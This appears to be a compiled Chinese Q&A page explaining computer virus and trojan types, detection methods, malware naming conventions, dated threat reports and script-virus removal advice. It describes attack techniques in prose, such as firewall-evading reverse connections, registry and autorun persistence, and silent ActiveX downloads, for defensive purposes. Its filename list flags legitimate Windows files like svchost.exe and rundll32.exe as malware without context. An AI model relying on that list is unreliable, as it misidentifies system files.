文件型病毒寄生在其他文件中,常常通過對它們的編碼加密或使用其他技術來隱藏自己。文件型病毒劫奪用來啟動主程序的可執行命令,用作它自身的運行命令。同時還經常將控制權還給主程序,以偽裝您的計算機系統正常運行。
一旦您運行感染了病毒的程序文件,病毒便被激發,執行大量的操作,並進行自我復制,同時附著在您系統其他可執行文件上偽裝自身,並留下標記,以後不再重復感染。
宏病毒
它是一種特殊的文件型病毒,在一些軟體開發商開始產品研發中引入宏語言,並允許這些產品在生成載有宏的數據文件之後出現。
宏的功能十分強大,相當多的軟體包中都引入了宏,這樣便給宏病毒一可趁之機!
腳本病毒
腳本病毒依賴一種特殊的腳本語言(如:VBScript、JavaScript等)起作用,同時需要主軟體或應用環境能夠正確識別和翻譯這種腳本語言中嵌套的命令。腳本病毒在某方面與宏病毒類似,但腳本病毒可以在多個產品環境中進行,還能在其他所有可以識別和翻譯它的產品中運行。腳本語言比宏語言更具有開放終端的趨勢,這樣使得病毒製造者對感染腳本病毒得機器可以有更多的控制力。
網路蠕蟲程序
網路蠕蟲程序是一種通過間接方式復制自身非感染型病毒。有些網路蠕蟲攔截e-mail系統向世界各地發送自己的復製品;有些則出現在高速下載站點中同時使用兩種方法與其它技術傳播自身。它的傳播速度相當驚人,成千上萬的病毒感染造成眾多郵件伺服器先後崩潰,給人們帶來難以彌補的損失。
「特洛伊木馬」程序
特洛伊木馬程序通常是指偽裝成合法軟體的非感染型病毒,但它不進行自我復制。有些木馬可以模仿運行環境,收集所需的信息,最常見的木馬便是試圖竊取用戶名和密碼的登錄窗口,或者試圖從眾多的Internet 伺服器提供商(ISP)盜竊用戶的注冊信息和賬號信息。
檢測病毒方法
在與病毒的對抗中,及早發現病毒很重要。早發現,早處置,可以減少損失。檢測病毒方法大致有:特徵代碼法、校驗和法、行為監測法、軟體模擬法,這些方法依據的原理不同,實現時所需開銷不同,檢測范圍不同,各有所長。
特徵代碼法
特徵代碼法是使用最為普遍的病毒檢測方法,同時是檢測已知病毒的最簡單、開銷最小的方法。
特徵碼查毒就是檢查文件中是否含有病毒資料庫中的病毒特徵代碼。採用病毒特徵代碼法的檢測工具,必須不斷更新版本,否則檢測工具便會老化,逐漸失去實用價值。病毒特徵代碼法對從未見過的新病毒,無法檢測。
二、校驗和法
將正常文件的內容,計算其校驗和,寫入文件中保存。定期檢查文件的校驗和與原來保存的校驗和是否一致,可以發現文件是否感染病毒,這種方法叫校驗和法,它既可發現已知病毒又可發現未知病毒。
由於病毒感染並非文件內容改變的惟一的非他性原因,文件內容的改變有可能是正常程序引起的,所以校驗和法常常誤報警。而且此種方法也會影響文件的運行速度。因而用監視文件的校驗和來檢測病毒,不是最好的方法。
校驗和法的優點是:方法簡單能發現未知病毒、被查文件的細微變化也能發現。其缺點是:對文件內容的變化過於敏感、會誤報警、不能識別病毒名稱、不能對付隱蔽型病毒。
三、行為監測法
利用病毒的特有行為特徵性來監測病毒的方法,稱為行為監測法。通過對病毒多年的觀察、研究,有一些行為是病毒的共同行為,而且比較特殊。當程序運行時,監視其行為,如果發現了病毒行為,立即報警。
行為監測法的長處:可發現未知病毒、可相當准確地預報未知的多數病毒。行為監測法的短處:可能誤報警、不能識別病毒名稱、實現時有一定難度。
軟體模擬法,以後演繹為虛擬機查毒,啟發式查毒技術,是相對成熟的技術。
G. 病毒和木馬的種類以及防治
病毒,木馬種類和名稱大全
一 木馬的種類:
1破壞型
惟一的功能就是破壞並且刪除文件,可以自動的刪除電腦上的DLL、INI、EXE文件
2、密碼發送型
可以找到隱藏密碼並把它們發送到指定的信箱。有人喜歡把自己的各種密碼以文件的形式存放在計算機中,認為這樣方便;還有人喜歡用WINDOWS提供的密碼記憶功能,這樣就可以不必每次都輸入密碼了。許多黑客軟體可以尋找到這些文件,把它們送到黑客手中。也有些黑客軟體長期潛伏,記錄操作者的鍵盤操作,從中尋找有用的密碼。
3、遠程訪問型
最廣泛的是特洛伊馬,只需有人運行了服務端程序,如果客戶知道了服務端的IP地址,就可以實現遠程式控制制。以下的程序可以實現觀察"受害者"正在干什麼,當然這個程序完全可以用在正道上的,比如監視學生機的操作。
4.鍵盤記錄木馬
這種特洛伊木馬是非常簡單的。它們只做一件事情,就是記錄受害者的鍵盤敲擊並且在LOG文件里查找密碼。
5.DoS攻擊木馬
隨著DoS攻擊越來越廣泛的應用,被用作DoS攻擊的木馬也越來越流行起來。當你入侵了一台機器,給他種上DoS攻擊木馬,那麼日後這台計算機就成為你DoS攻擊的最得力助手了。你控制的肉雞數量越多,你發動DoS攻擊取得成功的機率就越大。所以,這種木馬的危害不是體現在被感染計算機上,而是體現在攻擊者可以利用它來攻擊一台又一台計算機,給網路造成很大的傷害和帶來損失。
6.代理木馬
黑客在入侵的同時掩蓋自己的足跡,謹防別人發現自己的身份是非常重要的,因此,給被控制的肉雞種上代理木馬,讓其變成攻擊者發動攻擊的跳板就是代理木馬最重要的任務。通過代理木馬,攻擊者可以在匿名的情況下使用Telnet,ICQ,IRC等程序,從而隱蔽自己的蹤跡
7.FTP木馬
這種木馬可能是最簡單和古老的木馬了,它的惟一功能就是打開21埠,等待用戶連接。現在新FTP木馬還加上了密碼功能,這樣,只有攻擊者本人才知道正確的密碼,從而進人對方計算機。
8.程序殺手木馬
上面的木馬功能雖然形形色色,不過到了對方機器上要發揮自己的作用,還要過防木馬軟體這一關才行。常見的防木馬軟體有ZoneAlarm,Norton Anti-Virus等。程序殺手木馬的功能就是關閉對方機器上運行的這類程序,讓其他的木馬更好地發揮作用
9.反彈埠型木馬
木馬是木馬開發者在分析了防火牆的特性後發現:防火牆對於連入的鏈接往往會進行非常嚴格的過濾,但是對於連出的鏈接卻疏於防範。於是,與一般的木馬相反,反彈埠型木馬的服務端 (被控制端)使用主動埠,客戶端 (控制端)使用被動埠。木馬定時監測控制端的存在,發現控制端上線立即彈出埠主動連結控制端打開的主動埠;為了隱蔽起見,控制端的被動埠一般開在80,即使用戶使用掃描軟體檢查自己的埠,發現類似TCP UserIP:1026 ControllerIP:80ESTABLISHED的情況,稍微疏忽一點,你就會以為是自己在瀏覽網頁。
二:
1開機磁區病毒
2檔案型病毒
3巨集病毒
4其他新種類的病毒
三:
1計算機病毒名稱
沖擊波(WORM_MSBlast.A)
W97M_Etkill(宏病毒)
搗毀者(W97M_ TRASHER.D)
.......等等...........
2木馬病毒
木馬病毒的前綴是:Trojan
如Q尾巴:Trojan.QQPSW
網路游戲木馬:Trojan.StartPage.FH等
3腳本病毒
腳本病毒的前綴是:Script
如:紅色代碼Script.Redlof
4系統病毒
系統病毒的前綴為:Win32、PE、Win95、W32、W95等
如以前有名的CIH病毒就屬於系統病毒
5宏病毒
宏病毒的前綴是:Macro,第二前綴有Word、Word97、Excel、Excel97等
如以前著名的美麗莎病毒Macro.Melissa。
6蠕蟲病毒
蠕蟲病毒的前綴是:Worm
大家比較熟悉的這類病毒有沖擊波、震盪波等
7捆綁機病毒
捆綁機病毒的前綴是:Binder
如系統殺手Binder.killsys
8後門病毒
後門病毒的前綴是:Backdoor
如愛情後門病毒Worm.Lovgate.a/b/c
9壞性程序病毒
破壞性程序病毒的前綴是:Harm
格式化C盤(Harm.formatC.f)、殺手命令(Harm.Command.Killer)等。
10玩笑病毒
玩笑病毒的前綴是:Joke
如:女鬼(Joke.Girlghost)病毒。
常見木馬名稱:
Mbbmanager.exe → 聰明基因
_.exe → Tryit Mdm.exe → Doly 1.6-1.7
Aboutagirl.exe → 初戀情人 Microsoft.exe → 傳奇密碼使者
Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆達病毒
Aplica32.exe → 將死者病毒 Mprdll.exe → Bla
Avconsol.exe → 將死者病毒 Msabel32.exe → Cain and Abel
Avp.exe → 將死者病毒 Msblast.exe → 沖擊波病毒
Avp32.exe → 將死者病毒 Mschv.exe → Control
Avpcc.exe → 將死者病毒 Msgsrv36.exe → Coma
Avpm.exe → 將死者病毒 Msgsvc.exe → 火鳳凰
Avserve.exe → 震盪波病毒 Msgsvr16.exe → Acid Shiver
Bbeagle.exe → 惡鷹蠕蟲病毒 Msie5.exe → Canasson
Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup
Cfiadmin.exe → 將死者病毒 Mstesk.exe → Doly 1.1-1.5
Cfiaudit.exe → 將死者病毒 Netip.exe → Spirit 2000 Beta
Cfinet32.exe → 將死者病毒 Netspy.exe → 網路精靈
Checkdll.exe → 網路公牛 Notpa.exe → Backdoor
Cmctl32.exe → Back Construction Odbc.exe → Telecommando
Command.exe → AOL Trojan Pcfwallicon.exe → 將死者病毒
Diagcfg.exe → 廣外女生 Pcx.exe → Xplorer
Dkbdll.exe → Der Spaeher Pw32.exe → 將死者病毒
Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap
Dvldr32.exe → 口令病毒 Regscan.exe → 波特後門變種
Esafe.exe → 將死者病毒 Tftp.exe → 尼姆達病毒
Expiorer.exe → Acid Battery Thing.exe → Thing
Feweb.exe → 將死者病毒 User.exe → Schwindler
Flcss.exe → Funlove病毒 Vp32.exe → 將死者病毒
Frw.exe → 將死者病毒 Vpcc.exe → 將死者病毒
Icload95.exe → 將死者病毒 Vpm.exe → 將死者病毒
Icloadnt.exe → 將死者病毒 Vsecomr.exe → 將死者病毒
Icmon.exe → 將死者病毒 Server.exe → Revenger, WinCrash, YAT
Icsupp95.exe → 將死者病毒 Service.exe → Trinoo
Iexplore.exe → 惡郵差病毒 Setup.exe → 密碼病毒或Xana
Rpcsrv.exe → 惡郵差病毒 Sockets.exe → Vampire
Rundll.exe → SCKISS愛情森林 Something.exe → BladeRunner
Rundll32.exe→ 狩獵者病毒 Spfw.exe → 瑞波變種PX
Runouce.exe → 中國黑客病毒 Svchost.exe (線程105) → 藍色代碼
Scanrew.exe → 傳奇終結者 Sysedit32.exe → SCKISS愛情森林
Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat
Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河
Intel.exe → 傳奇叛逆 Syshelp.exe → 惡郵差病毒
Internet.exe → 傳奇幽靈 Sysprot.exe → Satans Back Door
Internet.exe → 網路神偷 Sysrunt.exe → Ripper
Kernel16.exe → Transmission Scount System.exe → s**tHeap
Kernel32.exe → 壞透了或冰河 System32.exe → DeepThroat 1.0
Kiss.exe → 傳奇天使 Systray.exe → DeepThroat 2.0-3.1
Krn132.exe → 求職信病毒 Syswindow.exe → Trojan Cow
Libupdate.exe → BioNet Task_Bar.exe
近期高危病毒/木馬:
病毒名稱:熊貓燒香
病毒名稱:U盤破壞者
最新病毒報告:
病毒名稱:Win32.Mitglieder.DU
病毒別名:Email-Worm.Win32.Bagle.gi
發現日期:2007/2/11
病毒種類:特洛伊木馬
病毒危害等級:★★★★★
病毒原理及基本特徵:
Win32.Mitglieder.DU是一種特洛伊病毒,能夠在被感染機器上打開一個後門,並作為一個SOCKS 4/5代理。特洛伊還會定期的連接與感染相關的信息的網站。病毒的主要運行程序大小為48,728位元組。
感染方式:
病毒的主體程序運行時,會復制到:
%System%\wintems.exe
Mitglieder.DU生成以下注冊表,以確保每次系統啟動時運行病毒:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\german.exe = "%System%\wintems.exe"
註:'%System%'是一個可變的路徑。病毒通過查詢操作系統來決定System文件夾的位置。Windows 2000 and NT默認的系統安裝路徑是C:\Winnt\System32; 95,98 和 ME 的是C:\Windows\System; XP 的是C:\Windows\System32。
危害:
SOCKS Proxy
Mitglieder.DU在25552埠打開一個SOCKS 4/5代理。
病毒名稱:「勒索者(Harm.Extortioner.a)」
病毒危害等級:★★★☆
依賴系統:WIN9X/NT/2000/XP。
病毒種類:惡意程序
病毒原理及基本特徵:
該惡意程序採用E語言編寫,運行後會將用戶硬碟上除系統盤的各個分區的文件刪除,將自身復制到根目錄下,試圖通過優盤、移動硬碟等移動存儲設備傳播,並會建立一個名為「警告」的文件。同時該病毒還會彈出內容為:「警告:發現您硬碟內曾使用過盜版了的我公司軟體,所以將您部份文件移到鎖定了的扇區,若要解鎖將文件釋放,請電郵liugongs196****[email protected]購買相應的軟體」的窗口,向用戶進行勒索.
病毒名稱:「情人節」(Vbs_Valentin.A)
病毒種類:腳本類病毒
發作日期:2月14日
危害程度:病毒主要通過電子郵件和mIRC(Internet 在線聊天系統)進行傳播, 並在2月14日「情人節」這一天,將受感染的計算機系統中C盤下的文件進行重命名,在其原文件名後增加後綴名「.txt」,並用一串西班牙字元覆蓋這些文件的內容,造成計算機系統無法正常使用
計算機病毒疫情監測周報
1
「威金」( Worm_Viking )
它主要通過網路共享進行傳播,會感染計算機系統中所有文件後綴名為.EXE的可執行文件,導致可執行文件無法正常啟動運行,這當中也包括計算機系統中防病毒軟體,蠕蟲變種會終止防病毒軟體,進而導致其無法正常工作。其傳播速度十分迅速,一旦進入區域網絡,很快就會導致整個區域網絡癱瘓。它還會在受感染的計算機系統里運行後,會修改系統注冊表的自啟動項,以使蠕蟲隨計算機系統啟動而自動運行。
2 「網路天空」變種(Worm_Netsky.D)
該病毒通過郵件傳播,使用UPX壓縮。運行後,在%Win dows%目錄下生成自身的拷貝,名稱為Winlogon.exe。 (其中,%Windows% 是Windows的默認文件夾,通常是 C:\Windows 或 C:\WINNT),病毒使用Word的圖標,並在共享文件夾中生成自身拷貝。病毒創建注冊表項,使得自身能夠在系統啟動時自動運行。病毒郵件的發信人、主題、內容和附件都是不固定的。
3 「高波」(Worm_AgoBot)
該病毒是常駐內存的蠕蟲病毒,利用RPC DCOM 緩沖區溢出漏洞、IIS5/WEBDAV 緩沖區溢出漏洞和RPC Locator 漏洞進行傳播,還可通過弱密碼攻擊遠程系統進行主動傳播以及利用mIRC軟體進行遠程式控制制和傳播。病毒運行後,在%System%文件夾下生成自身的拷貝nvchip4.exe。添加註冊表項,使得自身能夠在系統啟動時自動運行。
4 Worm_Mytob.X
該病毒是Worm_Mytob變種,並利用自身的SMTP引擎按照郵件地址列表中的郵件地址向外發送病毒郵件。該病毒還可以通過網路的共享文件夾進行搜索並嘗試在這些文件夾中產生自身的拷貝文件。還具有後門功能,會使用不同的埠連接到指定的伺服器上面,該伺服器監聽來自遠程惡意用戶的指令,利用這個指令遠程用戶可以控制受感染機器。同時,該變種利用一個任意的埠建立一個 FTP伺服器,遠程用戶可以下載或上傳文件或是惡意程序。
以下是目前中國流行的病毒列表,特此列出,以供參考:
1 x97m_laroux_aj
2 x97m_triplicate_c
3 Xm_laroux_a
4 w97m_birthday
5 w97m_class_cn@mm
6 w97m_class_d
7 w97m_class_Q
8 w97m_coco
9 w97m_coldape_b
10 w97m_ethan_a
11 w97m_jim_c@mm
12 w97m_julykiller
13 w97m_julykiller_a
14 w97m_julykiller_d
15 w97m_lulung_b
16 w97m_maker_c
17 w97m_maker_d
18 w97m_malaysia
19 w97m_melissa_m@mm
20 w97m_mellisa_a@mm
21 w97m_newhope_a
22 w97m_opey_h
23 w97m_ozwer_f
24 w97m_pri_a
25 w97m_story_a
26 w97m_thus_a
27 w97m_triplicate_c
28 w97m_Turn_a
29 w97m_twno_a
30 w97m_zhao 60
31 w97m_zhaojianli
32 wm_cap_a
33 wm_concept_a
34 1989
35 Dieh4000
36 8888
37 level42
38 natas4744
39 onehalf3544
40 binghe12
41 Happy99
42 Longnian
43 LOVE-LETTER-FOR-YOU
44 Sub7
45 miniexplore蠕蟲
46 explore蠕蟲
47 fix2001
48 Freelink
49 Prettypark
50 Stages-a
51 Bo2k
52 Jskak
53 cih12
54 cih13
55 cih14
56 Funlove
57 YAI
58 kriz4029
59 marburg
60 caw1262
61 W32.Navadid(聖誕節)
62 VBS/VBSWG.j@MM(庫爾尼科娃)
63 I-Worm.Badtrans
64 I-Worm.Magistr(馬吉斯)
65 Happytime(歡樂時光)
66 Hybris
67 I-Worm.MTX
68 Blebla.B(羅密歐與朱麗葉)
69 Homepage
70 Sircam
71 CodeRedII(紅色代碼II)
*72 klez(求職信)
*73 Aliz
安裝一個殺毒軟體定期查殺會起到一定的防範作用的。
*74 I-Worm.Badtrans.b
H. 什麼叫腳本病毒又何危害
腳本病毒
這類病毒編寫最為簡單,但造成的危害非常大。我們常見的瀏覽了xx站點就被改了主頁,在收藏夾里被添加上很多無謂的東西,就是拜這類病毒所賜。
病毒描述:這類病毒的本質是利用腳本解釋器的檢查漏洞和用戶許可權設置不當進行感染傳播;病毒本身是ascii碼或者加密的ascii碼,通過特定的腳本解釋器執行產生規定行為,因其行為對計算機用戶造成傷害,因此被定性為惡意程序。最常見的行為就是修改用戶主頁,搜索頁,修改用戶收藏夾,在每個文件夾下放置自動執行文件拖慢系統速度等;比較出名的如美利莎郵件病毒、新歡樂時光病毒、office的宏病毒等都屬於這類。
病毒淺析:為了完成一些自動化的任務,需要用程序方式來實現。但復雜的程序編寫又不是非程序人員能夠勝任的。為了提高工作效率,方便用戶操作,加強系統特性,於是許多軟體/操作系統都預留了介面給用戶,用簡單的方法編寫一些完成一定功能的小程序。程序本身是ascii碼的,不編譯,直接解釋執行,在調試/修改使用上相當簡便,雖然犧牲一定效率,但是換來了易用性。這本是一個良好的願望,但太多的時候,這沒有起到積極的作用,反而為腳本病毒編寫者提供了良機。
以web病毒為例,由於用戶缺乏安全意識用錯誤的許可權登陸,導致ie中的解釋器使用wsh可以操作硬碟上的文件和注冊表,而javascript和vbscript調用wsh是很容易的事情——於是惡意腳本的作者只需要讓你訪問該頁面,就能在你本地寫上一些惡意的腳本,在注冊表裡修改你的主頁/搜索項了。而利用ie的activex檢查漏洞,則可以在不提示地情況下從網路上下載文件並自動執行——這就成了木馬攻擊的前奏曲;利用mime頭漏洞,則可以用一個以jpg結尾的url中,指向一個事實上的web頁,然後在web頁中內嵌圖片+惡意代碼的方式迷惑計算機用戶;利用outlook自動讀去eml的特性和mime頭檢查不嚴格來執行惡意2進制代碼;利用本地硬碟上有執行autorun.inf的特性(這功能本來是光碟機用的,我們的光碟之所以放進去就能自動讀出程序,就是光碟上有個名為autorun.inf文件起的作用,它是個文本文件,各位可以看看)把一些需要載入的程序寫到該文件下導致每次訪問該分區的時候就會自動運行;利用windows下會優先讀取folder.htt和desktop.ini的特性,將惡意代碼寫入其中,導致訪問任何一個文件夾的時候都會啟動該病毒,再配合上鎖定注冊表的功能,殺除起來異常麻煩——不復雜,但是相當煩瑣,一不留意沒殺干凈一處,又導致死灰復燃,前功盡棄。
病毒自查:上面有提到,這類病毒一般以搗亂居多,所以特別容易發現。而其另一個作用是作為木馬進駐系統的先遣部隊,利用瀏覽器漏洞等達到下載木馬文件到本地硬碟,並修改啟動項,達到下次啟機運行的目的。因此一旦發現木馬的同時,也可以檢查一下是不是有些可疑的腳本文件。
病毒查殺:這類病毒一般來說由於其編寫靈活,源代碼公開,所以衍生版本格外地多;殺毒軟體/木馬殺除軟體對待這類病毒大多沒用。而由於腳本病毒(除宏病毒外)大多是獨立文件,只要將這些文件查找出來刪除掉就行了。不過這里值得留意的是,利用微軟的瀏覽器的漏洞,在點擊選擇某些文件的同時就自動執行了,甚至打開瀏覽器的同時腳本病毒就開始駐留感染——這樣是無法殺除干凈的。
正確的做法是使用其他第三方的資源瀏覽器,例如Total Command就是一個非常不錯的選擇。查殺大致過程如下:首先,在資源瀏覽器——工具——文件夾選項中,將「使用Windows傳統風格的桌面」取消掉,在桌面上點右鍵,點「屬性」——「桌面設置」,將使用活動桌面取消,接著查殺可疑對象;常見查殺對象:各個根分區下的autorun.inf,各個目錄下的desktop.ini和folder.htt(有幾個是系統自帶的,不過刪除了也無關系的),這一步最好採用第三方的資源瀏覽器,例如前面介紹的Total Command來完成。在這一步,最忌諱查殺不凈,即使有一個病毒遺漏,很快就又遍布各個文件夾內了。關於郵件病毒的殺除使用專殺工具就行了。
病毒殘留:純粹腳本病毒在殺除後不會有任何殘留,但由於目前的病毒大都採用復合形態,捆綁多種傳染方式和多種特性,因此不少腳本病毒只是將用戶機器的安全防線撕開的前奏——真正的破壞主力木馬、蠕蟲尾隨其後進入系統,因此在殺除掉腳本病毒後,非常有必要連帶著檢查系統中是否已經有了木馬和蠕蟲病毒。
病毒防禦:腳本病毒的特性之一就是被動觸發——因此防禦腳本病毒最好的方法是不訪問帶毒的文件/web網頁,在網路時代,腳本病毒更以欺騙的方式引誘人運行居多。由於ie本身存在多個漏洞,特別是執行activex的功能存在相當大的弊端,最近爆出的重大漏洞都和它有關,包括mozilla的windows版本也未能倖免。因此個人推薦使用myie2軟體代替ie作為默認瀏覽器,因為myie2中有個方便的功能是啟用/禁用web頁面的activex控制項,在默認的時候,可以將頁面中的activex控制項全部禁用,待訪問在線電影類等情況下根據自己的需要再啟用。關於郵件病毒,大多以eml作為文件後綴的,如果您單機有用outlook取信的習慣,最好准備一個能檢測郵件病毒的殺毒軟體並及時升級。如果非必要,將word等office軟體中的宏選項設置為禁用。腳本病毒是目前網路上最為常見的一類病毒,它編寫容易,源代碼公開,修改起來相當容易和方便,而且往往給用戶造成的巨大危害。
以上4類程序的介紹,為了降低學習難度,我是單態方式來介紹的。事實上目前的病毒大多以具有上面4類程序中的2到3類的特徵,因此無論感染,傳播,殺除的困難都大大增加。例如發文前夕的mydoom新變種病毒的分析中:它利用系統漏洞/郵件群發/共享漏洞方式傳播(具備了蠕蟲、腳本病毒和新型病毒的傳播特性),進駐用戶系統後上載自身並運行(木馬特性),獲取用戶本地outlook中的地址本(木馬特性),通過調用google等搜索引擎獲取用戶email地址本中同後綴的相關選項(調用系統程序,木馬功能),再主動給地址本中的每個程序發出email(木馬特性)。對待這樣一個病毒,無論是系統存在漏洞、共享安全設置不當、或者隨意地打開了「朋友」發來的email,都可能導致中毒。關於中毒途徑的分析,留待下一站《攻擊防禦之旅》內一並介紹。
在從第一個病毒出現到現在,已經有整整半個世紀了,病毒的發展日新月異,令查殺的困難大大增加,造成的損失也異常巨大。或許,計算機病毒這個幽靈,從計算機誕生的那一刻起就註定要如影相隨的。只要還有用心險惡的人存在,那麼病毒就不會消亡。病毒之戰,恐怕會在今後的日子裡越演越烈……
I. 什麼是腳本病毒啊
腳本病毒通常是JavaScript代碼編寫的惡意代碼,
一般帶有廣告性質,會修改您的IE首頁、修改注冊表等信息,造成用戶使用計算機不方便。
至於你說的那個,只要是殺毒查出來的,不管他,殺了!